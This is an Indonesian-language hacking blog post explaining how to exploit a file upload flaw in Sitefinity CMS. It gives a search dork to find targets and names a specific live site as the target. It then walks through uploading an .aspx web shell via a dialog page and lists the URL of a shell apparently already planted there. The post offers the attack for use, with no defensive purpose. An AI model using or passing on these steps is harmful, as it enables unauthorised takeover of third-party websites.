Sitefinity CMS ASP.Net file upload vulnerability

Selamat pagi siang sore malem, Kali ini Ane mau nge share " Sitefinity CMS ASP.Net file upload vulnerability" Dari pada bacod terus, mending liat aja, Cekibrott !
Dork : "Sitefinity: Login"

Target : http://www.cyberwolf-software.com/sitefinity/login.aspx

Exploit :
/sitefinity/login.aspx
ganti dengan
/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

lalu klik ( Select ) untuk upload shell, ingat upload shell yang .aspx tadi soalnya ini web berbasis ASP.Net
lalu klik "Upload selected"
Lihat gambar dibawah :

lalu klik "Insert"

jika sudah check di

lalu menuju Penyimpanan shell :

target.com/Files/shell.aspx

http://www.cyberwolf-software.com/Files/wksid.aspx

Taraa shell aspx nya sudah tertanam di web targett :)

Sumber Artikel : Suram-Crew

Adn48 Blog

Formulir Kontak